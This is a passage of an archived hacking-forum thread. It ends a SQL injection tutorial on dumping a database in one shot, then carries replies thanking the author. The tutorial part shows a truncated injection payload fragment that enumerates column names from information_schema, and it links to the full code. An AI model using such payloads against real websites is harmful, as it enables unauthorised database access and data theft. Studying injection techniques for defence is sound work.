phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">Select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">clm</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns&nbsp;where</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">0A&nbsp;table_name</span><span style="color: #7AC07C">=@</span><span style="color: #66CCFF">c_max_t_name</span><span style="color: #7AC07C">...&nbsp;<br></span></code></div></div></div><br>Final result:<br><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/8c8b60d95ecb2bcde9d7cbbcf17bd724.jpg" alt="[Image: 8c8b60d95ecb2bcde9d7cbbcf17bd724.jpg]" border="0"><br><br>Challenge solved <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> Complete code can you find <a href="http://pastie.org/private/4quyfltqbdqvbliddhi3q" target="_blank"><span style="text-decoration: underline;">here</span></a><br><br>In next part #4 I will explain how to combine data from variables of different DIOS for challenge <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4107862" target="_blank">#96</a></span><br><br>Thanks for reading <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_39247991"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4148766&amp;replyto=39247991" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39250975" id="pid39250975"></a><table class="tborder" style="margin-top: 5px; " id="post_39250975" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-02-2014, 01:15 PM <span id="edited_by_39250975"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4148766&amp;pid=39250975#pid39250975">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1892800"><span class="group2">Jtwa</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 35<br>Joined: Jul 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1892800"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39250975">I just want to thank you for all your hard work. I've read all you tutorials and they are very well written and well explained.<br><br>To be completely honest, you have me motivated to learn more SQLI.<br><br>Thanks again for everything you've done for the community.</div><div class="post_meta" id="post_meta_39250975"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1892800" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4148766&amp;replyto=39250975" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39260797" id="pid39260797"></a><table class="tborder" style="margin-top: 5px; " id="post_39260797" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-03-2014, 01:30 AM <span id="edited_by_39260797"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4148766&amp;pid=39260797#pid39260797">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=2195097"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/Red.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=2195097"><span class="group2">oiteenera</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 2<br>Posts: 41<br>Joined: Feb 2014<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=2195097"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39260797">awesomme mate :)<br>You the man, thanks <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"></div><div class="post_meta" id="post_meta_39260797"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=2195097" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4148766&amp;replyto=39260797" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39262486" id="pid39262486"></a><table class="tborder" style="margin-top: 5px; " id="post_39262486" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-03-2014, 05:20 AM <span id="edited_by_39262486"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4148766&amp;pid=39262486#pid39262486">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1179043"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/thumbnail.jpg" alt="" height="95" width="54"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1179043"><span class="group2">makmaniac</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 9<br>Posts: 84<br>Joined: Feb 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1179043"><strong class="reputation_positive">14</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39262486">Amazing as always .. I really appreciate your efforts you put in your tutorials .. <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br><br>Waiting for your next challenge .. <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"></div><div class="post_meta" id="post_meta_39262486"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1179043" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4148766&amp;replyto=39262486" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39262873" id="pid39262873"></a><table class="tborder" style="margin-top: 5px; " id="post_39262873" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-03-2014, 06:03 AM <span id="edited_by_39262873"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4148766&amp;pid=39262873#pid39262873">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 165<br>Posts: 2,239<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">225</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/sticky-bro.png" alt="Sticky Man" title="Sticky Man"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39262873"><blockquote><cite><span>(04-03-2014 05:20 AM)</span>makmaniac Wrote: <a href="http://www.hackforums.net/showthread.php?pid=39262486#pid39262486" class="quick_jump">►</a></cite>Amazing as always .. I really appreciate your efforts you put in your tutorials .. <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br><br>Waiting for your next challenge .. <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"></blockquote><br>Thank you all. I appreciate your feed back. <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br>@makman<br>Only two challenges left on my list (#99 and #100) <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_39262873"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4148766&amp;replyto=39262873" class="bitButton" rel="nofollow">Quote</a> </div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=4148766&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=4148766&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=4148766" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=4148766">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=4148766" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4148766&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-4148766.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->